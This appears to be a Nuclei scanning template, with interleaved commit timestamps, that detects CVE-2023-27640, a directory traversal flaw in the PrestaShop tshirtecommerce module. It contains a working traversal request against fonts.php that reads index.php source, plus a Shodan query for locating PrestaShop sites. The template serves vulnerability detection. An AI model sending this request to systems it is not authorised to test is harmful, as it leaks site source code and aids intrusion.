2023-12-31 16:09:36 +00:00
id : CVE-2023-27640
info :
name : PrestaShop tshirtecommerce Directory Traversal
author : MaStErChO
severity : high
description : |
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."
reference :
- https://www.cvedetails.com/cve/CVE-2023-27640/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
metadata :
max-request : 1
product : tshirtecommerce
framework : prestashop
shodan-query : http.component:"prestashop"
tags : cve,cve2023,prestashop,lfi
http :
- method : GET
path :
- "{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"
matchers-condition : and
matchers :
2023-12-31 16:34:01 +00:00
- type : dsl
2023-12-31 16:09:36 +00:00
dsl :
- contains(base64_decode(body), "PrestaShop")
2023-12-31 16:34:01 +00:00
- type : dsl
2023-12-31 16:09:36 +00:00
dsl :
- contains(base64_decode(body), "?php")